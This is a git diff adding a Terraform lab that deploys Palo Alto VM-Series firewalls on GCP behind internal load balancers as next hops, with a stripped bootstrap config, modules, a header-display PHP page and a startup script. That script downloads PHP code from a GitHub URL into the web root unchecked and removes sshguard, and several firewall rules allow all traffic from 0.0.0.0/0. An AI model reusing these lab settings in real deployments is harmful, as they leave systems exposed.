+ group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + loopback.1 + + + + + + + + + + + + 10.30.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + Health-Check-Probe1 + + + + + + + 10.30.1.1 + + + None + + + no + any + 2 + + 
ethernet1/1 + 10 + Health-Check-Probe2 + + + + + + + no + any + 2 + + + trust2 + + + None + + 10 + 10.50.1.0/24 + + + + + + + no + any + 2 + + + trust3 + + + None + + 10 + 10.40.1.0/24 + + + + + + + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + 10.50.1.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + Health-Check-Probe1 + + + + + + + 10.50.1.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + Health-Check-Probe2 + + + + + + + no + any + 2 + + + trust1 + + + None + + 10 + 10.30.1.0/24 + + + + + + + no + any + 2 + + + trust3 + + + None + + 10 + 10.40.1.0/24 + + + + + + + + + 120 + + + ethernet1/2 + loopback.2 + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + 10.40.1.1 + + + None + + + no + any + 2 + + ethernet1/3 + 10 + Health-Check-Probe1 + + + + + + + 10.40.1.1 + + + None + + + no + any + 2 + + ethernet1/3 + 10 + Health-Check-Probe2 + + + + + + + no + any + 2 + + + trust1 + + + None + + 10 + 10.30.1.0/24 + + + + + + + no + any + 2 + + + trust2 + + + None + + 10 + 10.50.1.0/24 + + + + + + + + + ethernet1/3 + loopback.3 + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + no + + Multi-Nic-ILB + + + yes + no + no + no + + + yes + + + + + yes + 1 + + + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0 + + + yes + no + no + no + + + multi-nic-ilb + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + loopback.2 + + + + + + + ethernet1/3 + loopback.3 + + + + + + + + + 22 + + + + + + + 221 + + + + + + + 222 + + + + + + + + + + + + any + + + Trust1 + Trust2 + + + Health-Check-Group + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + no + no + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + Trust1 + + + any + + + Testing Network + + + any + + any + no + + + + + + ethernet1/2 + + + + + Trust2 + + + any + + + Production Network + + + any + + any + no + + + + + + + deny + yes + yes + + + allow + yes + yes + + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + + + +
+ + 35.191.0.0/16 + + + 130.211.0.0/22 + + + 10.50.1.0/24 + + + 10.30.1.0/24 + +
+ + + + ethernet1/1 + loopback.1 + ethernet1/2 + loopback.2 + ethernet1/3 + loopback.3 + + + + + + + Health-Check-Probe1 + Health-Check-Probe2 + + + +
+
+
+
+
diff --git a/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..5b9c168b --- /dev/null +++ b/gcp/ilbnh-mig/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=packet-mirroring +op-command-modes=mgmt-interface-swap +dns-primary= +dns-secondary= \ No newline at end of file diff --git a/gcp/ilbnh-mig/fw_common.tf b/gcp/ilbnh-mig/fw_common.tf new file mode 100644 index 00000000..aeaa685c --- /dev/null +++ b/gcp/ilbnh-mig/fw_common.tf @@ -0,0 +1,106 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for firewalls +module "bootstrap_common" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-common" + file_location = "bootstrap_files/" + config = ["init-cfg.txt", "bootstrap.xml"] +# config = ["init-cfg.txt"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create firewall template +#----------------------------------------------------------------------------------------------- +module "fw_common" { + source = "./modules/vmseries/" + base_name = var.fw_base_name + region = var.region + target_size = var.target_size + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + networks = [ + module.vpc0.network_self_link, + module.vpc1.network_self_link, + module.vpc2.network_self_link, + module.vpc3.network_self_link + ] + subnetworks = [ + module.vpc0.subnetwork_self_link, + module.vpc1.subnetwork_self_link, + module.vpc2.subnetwork_self_link, + module.vpc3.subnetwork_self_link + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_common.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = false + nic1_public_ip = true + nic2_public_ip = false + nic3_public_ip = false + create_instance_group = true + + dependencies = [ + module.bootstrap_common.completion, + ] +} + +resource "google_compute_health_check" "hc_ssh_22" { + name = "hc-ssh-22" + + tcp_health_check { + port = var.health_check_port + } +} + +module "ilb1" { + source = "./modules/ilbnh/" + name = "ilb1" + project_id = var.project_id + all_ports = true + ports = [] + health_checks = [google_compute_health_check.hc_ssh_22.self_link] + region = var.region + network = module.vpc0.vpc_id + network_uri = module.vpc0.network_self_link + subnetwork = module.vpc0.subnetwork_self_link + ip_address = var.ilb1_ip + group = module.fw_common.vmseries_rigm +} + +module "ilb2" { + source = "./modules/ilbnh/" + name = "ilb2" + project_id = var.project_id + all_ports = true + ports = [] + health_checks = [google_compute_health_check.hc_ssh_22.self_link] + region = var.region + network = module.vpc2.vpc_id + network_uri = module.vpc2.network_self_link + subnetwork = module.vpc2.subnetwork_self_link + ip_address = var.ilb2_ip + group = module.fw_common.vmseries_rigm + } + +#----------------------------------------------------------------------------------------------- +# Create routes route to internal LBs. 
+resource "google_compute_route" "ilb_nhop_dest_10_30_1" { + name = "ilb-nhop-dest-10-30-1" + dest_range = "10.30.1.0/24" + network = module.vpc2.network_self_link + next_hop_ilb = module.ilb2.forwarding_rule + priority = 99 +} + +resource "google_compute_route" "ilb_nhop_dest_10_50_1" { + name = "ilb-nhop-dest-10-50-1" + dest_range = "10.50.1.0/24" + network = module.vpc0.network_self_link + next_hop_ilb = module.ilb1.forwarding_rule + priority = 99 +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/fw_vpc.tf b/gcp/ilbnh-mig/fw_vpc.tf new file mode 100644 index 00000000..230a66c0 --- /dev/null +++ b/gcp/ilbnh-mig/fw_vpc.tf @@ -0,0 +1,40 @@ +#----------------------------------------------------------------------------------------------- +# Create firewall VPCs & subnets +module "vpc0" { + source = "./modules/vpc/" + vpc = var.vpc0 + subnet = var.vpc0_subnet + cidr = var.vpc0_cidr + region = var.region + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc1" { + source = "./modules/vpc/" + vpc = var.vpc1 + subnet = var.vpc1_subnet + cidr = var.vpc1_cidr + region = var.region + allowed_sources = var.mgmt_sources + allowed_protocol = "TCP" + allowed_ports = ["443", "22"] +} + +module "vpc2" { + source = "./modules/vpc/" + vpc = var.vpc2 + subnet = var.vpc2_subnet + cidr = var.vpc2_cidr + region = var.region + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc3" { + source = "./modules/vpc/" + vpc = var.vpc3 + subnet = var.vpc3_subnet + cidr = var.vpc3_cidr + region = var.region + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} diff --git a/gcp/ilbnh-mig/images/curl.png b/gcp/ilbnh-mig/images/curl.png new file mode 100644 index 00000000..e17b875c Binary files /dev/null and b/gcp/ilbnh-mig/images/curl.png differ diff --git a/gcp/ilbnh-mig/images/deployment.png b/gcp/ilbnh-mig/images/deployment.png new file mode 100644 index 00000000..636f95d1 Binary files /dev/null and b/gcp/ilbnh-mig/images/deployment.png differ diff --git a/gcp/ilbnh-mig/images/diagram.svg b/gcp/ilbnh-mig/images/diagram.svg new file mode 100644 index 00000000..d68679f4 --- /dev/null +++ b/gcp/ilbnh-mig/images/diagram.svg @@ -0,0 +1,805 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Produced by OmniGraffle 7.9.4 + 2019-11-05 23:49:25 +0000 + + + ilb-as-next-hop + + Layer 1 + + + + + + + + + + Configuration + + + + + + Connectivity + + + + + + + + + + + + GCP Zone + + + + + Page-1 + + Shape + + + + Shape + + + + Shape + + + + Shape + + + Oval + + + + + GCP logo + + Fill-3 + + + + Fill-5 + + + + Fill-7 + + + + Fill-8 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + Fill-16 + + + + Fill-17 + + + + Fill-18 + + + + Fill-19 + + + + Fill-20 + + + + Fill-21 + + + + Fill-22 + + + + Fill-23 + + + + + + zone external - grey + + + Project + + + + zone internal - blue + + + + VPC network: testing + + + + + Fill-7 + + + + + Fill-10 + + + + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + + zone internal - green + + + + Region: us-west1 + + + + zone internal - purple + + + + Subnet: 10.30.1.0/24 + + + + + + + + + + + + + - Destination: 10.50.1.0/24 + - Next-hop-ilb = fr-ilb + + + + + + Static routes + + + + Cloud Routes + + Fill-6 + + + + Fill-8 + + + + Fill-10 + + + + + + + + + + + + + + + + - Destination: 10.30.1.0/24 + - Next hop: virtual network + + + + + Subnet 
routes + + + + Cloud Routes + + Fill-6 + + + + Fill-8 + + + + Fill-10 + + + + + + + + + + + Shuffle + + + + + VPC Routing + + + + + + + + + + + + + + Forwarding rule name : fr-llb1 + IP address: 10.30.1.99 + + + + + Internal Forwarding Rule + + + + + + Fill-7 + + + + + Fill-10 + + + + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + + zone internal - blue + + + + VPC network:production + + + + + Fill-7 + + + + + Fill-10 + + + + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + + + + + + + + + + + - Destination: 10.50.1.0/24 + - Next hop: virtual network + + + + + + Subnet routes + + + + Cloud Routes + + Fill-6 + + + + Fill-8 + + + + Fill-10 + + + + + + + + + + + + Shuffle + + + + + VPC Routing + + + + + zone internal - green + + + + Region: us-west1 + + + + zone internal - purple + + + + Subnet: 10.50.1.0/24 + + + + zone internal - white + + + + Managed Instance Group + third-party-template + + + + + + + + + + Regional Internal + Backend Service + + + + + + + + + + + Source: 10.30.1.100 + Destination: 10.50.1.100 + + + + + + + + + + + Source address translated + Firewall VM performs SNAT + Source: 10.50.1.x + Destination: 10.50.1.100 + + + + + + nic0 + 10.30.1.x + + + + + nic1 + 10.50.1.x + + + + + + + + + + + + + 10.50.1.100 + + + + + production-vm + + + + Compute Engine + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Stroke-21 + + + + Stroke-22 + + + + + + + + + can_ip_forward: + True + + + + + Firewall + Instances + + + + Compute Engine + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + + + + + + + + + + + + 10.30.1.100 + + + + + + testing-vm + + + + Compute Engine + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + + + + + + + + + + + + diff --git a/gcp/ilbnh-mig/images/directory.png b/gcp/ilbnh-mig/images/directory.png new file mode 100644 index 00000000..8317ff94 Binary files /dev/null and b/gcp/ilbnh-mig/images/directory.png differ diff --git a/gcp/ilbnh-mig/images/fwlogs.png b/gcp/ilbnh-mig/images/fwlogs.png new file mode 100644 index 00000000..52ea690c Binary files /dev/null and b/gcp/ilbnh-mig/images/fwlogs.png differ diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf new file mode 100644 index 00000000..a93e7956 --- /dev/null +++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf @@ -0,0 +1,85 @@ +locals { + bucket_name = join("", [var.bucket_name, random_string.randomstring.result]) +} +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = local.bucket_name + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = length(var.config) > 0 ? length(var.config) : "0" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_full" { + count = length(var.content) > 0 ? 
length(var.content) : "0" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_full" { + count = length(var.license) > 0 ? length(var.license) : "0" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_full" { + count = length(var.software) > 0 ? length(var.software) : "0" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "config_empty" { + count = length(var.config) == 0 ? 1 : 0 + name = "config/" + content = "config/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_empty" { + count = length(var.content) == 0 ? 1 : 0 + name = "content/" + content = "content/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_empty" { + count = length(var.license) == 0 ? 1 : 0 + name = "license/" + content = "license/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_empty" { + count = length(var.software) == 0 ? 1 : 0 + name = "software/" + content = "software/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "null_resource" "dependency_setter" { + depends_on = [ + google_storage_bucket.bootstrap, + google_storage_bucket_object.config_full, + google_storage_bucket_object.content_full, + google_storage_bucket_object.license_full, + google_storage_bucket_object.software_full, + google_storage_bucket_object.config_empty, + google_storage_bucket_object.content_empty, + google_storage_bucket_object.license_empty, + google_storage_bucket_object.software_empty, + ] +} + diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf new file mode 100644 index 00000000..ef7f162d --- /dev/null +++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf @@ -0,0 +1,8 @@ +output completion { + value = null_resource.dependency_setter.id +} + +output bucket_name { + value = google_storage_bucket.bootstrap.name +} + diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf new file mode 100644 index 00000000..0db2b8fd --- /dev/null +++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf @@ -0,0 +1,24 @@ +variable bucket_name { +} + +variable file_location { +} + +variable config { + type = list(string) + default = [] +} + +variable content { + type = list(string) + default = [] +} + +variable license { + type = list(string) + default = [] +} + +variable software { + default = [] +} diff --git a/gcp/ilbnh-mig/modules/ilbnh/main.tf b/gcp/ilbnh-mig/modules/ilbnh/main.tf new file mode 100644 index 00000000..e3491df0 --- /dev/null +++ b/gcp/ilbnh-mig/modules/ilbnh/main.tf @@ -0,0 +1,27 @@ +#----------------------------------------------------------------------------------------------- +# Create the internal load balancers, one for the testing network and one for the production network. 
+# This resource will destroy (potentially immediately) after null_resource.next +resource "google_compute_region_backend_service" "default" { + provider = "google-beta" + name = var.name + project = var.project_id + load_balancing_scheme = "INTERNAL" + health_checks = var.health_checks + region = var.region + network = var.network_uri + + backend { + group = var.group + } +} + +resource "google_compute_forwarding_rule" "default" { + name = "fr-${var.name}" + region = var.region + load_balancing_scheme = "INTERNAL" + backend_service = google_compute_region_backend_service.default.id + all_ports = var.all_ports + network = var.network + subnetwork = var.subnetwork + ip_address = var.ip_address +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/ilbnh/outputs.tf b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf new file mode 100644 index 00000000..d99cc408 --- /dev/null +++ b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf @@ -0,0 +1,3 @@ +output forwarding_rule { + value = google_compute_forwarding_rule.default.self_link +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/ilbnh/variables.tf b/gcp/ilbnh-mig/modules/ilbnh/variables.tf new file mode 100644 index 00000000..585f8276 --- /dev/null +++ b/gcp/ilbnh-mig/modules/ilbnh/variables.tf @@ -0,0 +1,41 @@ +variable project_id { +} + +variable region { +} + +variable name { +} + +variable health_checks { + type = list(string) + default = [] +} + +variable group { +} + +variable subnetwork { +} + +variable ip_address { + default = null +} + +variable ip_protocol { + default = "TCP" +} +variable all_ports { + type = bool +} +variable ports { + type = list(string) + default = [] +} + +variable network { + default = null +} + +variable network_uri { +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vm/main.tf b/gcp/ilbnh-mig/modules/vm/main.tf new file mode 100644 index 00000000..fff23b2e --- /dev/null +++ b/gcp/ilbnh-mig/modules/vm/main.tf @@ -0,0 +1,34 @@ +resource "google_compute_instance" "default" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + can_ip_forward = false + allow_stopping_for_update = true + metadata_startup_script = var.startup_script + + metadata = { + serial-port-enable = true + ssh-keys = var.ssh_key + } + + network_interface { + dynamic "access_config" { + for_each = var.server_public_ip ? 
[""] : [] + content {} + } + subnetwork = element(var.subnetworks, count.index) + network_ip = element(var.server_ips, count.index) + + } + + boot_disk { + initialize_params { + image = var.image + } + } + + service_account { + scopes = var.scopes + } +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vm/outputs.tf b/gcp/ilbnh-mig/modules/vm/outputs.tf new file mode 100644 index 00000000..75856670 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vm/outputs.tf @@ -0,0 +1,7 @@ +output vm_names { + value = google_compute_instance.default.*.name +} + +output vm_self_link { + value = google_compute_instance.default.*.self_link +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vm/variables.tf b/gcp/ilbnh-mig/modules/vm/variables.tf new file mode 100644 index 00000000..76b51bf5 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vm/variables.tf @@ -0,0 +1,44 @@ +variable names { + type = list(string) +} + +variable machine_type { +} + +variable zones { + type = list(string) +} +variable ssh_key { + default = "" +} +variable image { +} + +variable subnetworks { + type = list(string) +} + +variable server_ips { + type = list(string) +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable startup_script { + default = "" +} + +variable server_public_ip { + type = bool + default = false +} + diff --git a/gcp/ilbnh-mig/modules/vmseries/main.tf b/gcp/ilbnh-mig/modules/vmseries/main.tf new file mode 100644 index 00000000..0b78dd00 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vmseries/main.tf @@ -0,0 +1,84 @@ +resource "google_compute_instance_template" "vmseries" { + name = "vmseries-template" + description = "This template is used to create firewall instances." + instance_description = "VM-Series for ILBNH" + region = var.region + machine_type = var.machine_type + min_cpu_platform = var.cpu_platform + can_ip_forward = true + tags = var.tags + + scheduling { + automatic_restart = true + on_host_maintenance = "MIGRATE" + } + + metadata = { + mgmt-interface-swap = var.mgmt_interface_swap + vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket + serial-port-enable = true + ssh-keys = var.ssh_key + } + + service_account { + scopes = var.scopes + } + + network_interface { + + dynamic "access_config" { + for_each = var.nic0_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[0] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic1_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[1] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic2_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[2] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic3_public_ip ? 
[""] : [] + content {} + } + subnetwork = var.subnetworks[3] + } + + disk { + source_image = var.image + type = var.disk_type + } + + lifecycle { + create_before_destroy = "true" + } +} + +resource "google_compute_region_instance_group_manager" "vmseries_rigm" { + name = "vmseries-rigm" + base_instance_name = var.base_name + region = var.region + target_size = var.target_size + + version { + instance_template = google_compute_instance_template.vmseries.self_link + } + + named_port { + name = "http" + port = "80" + } +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vmseries/outputs.tf b/gcp/ilbnh-mig/modules/vmseries/outputs.tf new file mode 100644 index 00000000..11bd3b53 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vmseries/outputs.tf @@ -0,0 +1,3 @@ +output vmseries_rigm { + value = google_compute_region_instance_group_manager.vmseries_rigm.instance_group +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vmseries/variables.tf b/gcp/ilbnh-mig/modules/vmseries/variables.tf new file mode 100644 index 00000000..271a7b55 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vmseries/variables.tf @@ -0,0 +1,121 @@ +variable networks { + type = list(string) +} + +variable subnetworks { + type = list(string) +} + +variable base_name { +} + +variable machine_type { +} + +variable region { +} + +variable zones { + type = list(string) +} + +variable cpu_platform { + default = "Intel Broadwell" +} +variable disk_type { + default = "pd-ssd" +} +variable bootstrap_bucket { + default = "" +} + +variable ssh_key { + default = "" +} + +variable public_lb_create { + default = false +} + +variable target_size { + default = "1" +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable image { +} + +variable tags { + type = list(string) + default = [] +} + +variable create_instance_group { + type = bool + default = false +} + +variable instance_group_names { + type = list(string) + default = ["vmseries-instance-group"] +} + +variable dependencies { + type = list(string) + default = [] +} + +variable mgmt_interface_swap { + default = "" +} + +variable nic0_ip { + type = list(string) + default = [""] +} + +variable nic1_ip { + type = list(string) + default = [""] +} + +variable nic2_ip { + type = list(string) + default = [""] +} + +variable nic3_ip { + type = list(string) + default = [""] +} + +variable nic0_public_ip { + type = bool + default = false +} + +variable nic1_public_ip { + type = bool + default = false +} + +variable nic2_public_ip { + type = bool + default = false +} + +variable nic3_public_ip { + type = bool + default = false +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vpc/main.tf b/gcp/ilbnh-mig/modules/vpc/main.tf new file mode 100644 index 00000000..6c681d08 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vpc/main.tf @@ -0,0 +1,25 @@ +resource "google_compute_network" "default" { + name = var.vpc + delete_default_routes_on_create = var.delete_default_route + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + name = var.subnet + ip_cidr_range = var.cidr + region = var.region + network = google_compute_network.default.self_link +} + +resource "google_compute_firewall" "default" { + count = length(var.allowed_sources) != 0 ? 
1 : 0 + name = "${google_compute_network.default.name}-ingress" + network = google_compute_network.default.self_link + direction = "INGRESS" + source_ranges = var.allowed_sources + + allow { + protocol = var.allowed_protocol + ports = var.allowed_ports + } +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vpc/outputs.tf b/gcp/ilbnh-mig/modules/vpc/outputs.tf new file mode 100644 index 00000000..dbf7ed78 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vpc/outputs.tf @@ -0,0 +1,29 @@ +output network_self_link { +# value = google_compute_network.default.*.self_link + value = google_compute_network.default.self_link +} + +output subnetwork_id { + value = google_compute_subnetwork.default.*.id +} + +output subnetwork_name { + value = google_compute_subnetwork.default.*.name +} + +output subnetwork_self_link { +# value = google_compute_subnetwork.default.*.self_link + value = google_compute_subnetwork.default.self_link +} + +output vpc_name { + value = google_compute_network.default.*.name +} + +output vpc_id { + value = google_compute_network.default.*.id[0] +} + +output vpc_self_link { + value = google_compute_network.default.*.self_link[0] +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vpc/variables.tf b/gcp/ilbnh-mig/modules/vpc/variables.tf new file mode 100644 index 00000000..04407a0d --- /dev/null +++ b/gcp/ilbnh-mig/modules/vpc/variables.tf @@ -0,0 +1,29 @@ +variable vpc { +} + +variable subnet { +} + +variable cidr { +} + +variable region { +} + +variable allowed_sources { + type = list(string) + default = [] +} + +variable allowed_protocol { + default = "all" +} + +variable allowed_ports { + type = list(string) + default = [] +} + +variable delete_default_route { + default = "false" +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/project.tf b/gcp/ilbnh-mig/project.tf new file mode 100644 index 00000000..a65b533f --- /dev/null +++ b/gcp/ilbnh-mig/project.tf @@ -0,0 +1,15 @@ +terraform { + required_version = ">= 0.12" +} + +provider "google" { + credentials = var.auth_file + project = var.project_id + region = var.region +} + +provider "google-beta" { + version = "> 2.50.0" +} + +data "google_compute_zones" "available" {} \ No newline at end of file diff --git a/gcp/ilbnh-mig/scripts/showheaders.php b/gcp/ilbnh-mig/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/ilbnh-mig/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/ilbnh-mig/scripts/webserver-startup.sh b/gcp/ilbnh-mig/scripts/webserver-startup.sh new file mode 100644 index 00000000..a19aefe9 --- /dev/null +++ b/gcp/ilbnh-mig/scripts/webserver-startup.sh @@ -0,0 +1,9 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get autoremove -y --purge sshguard; do echo "Retrying"; sleep 2; done \ No newline at end of file diff --git a/gcp/ilbnh-mig/servers.tf b/gcp/ilbnh-mig/servers.tf new file mode 100644 index 00000000..fe563ba5 --- /dev/null +++ 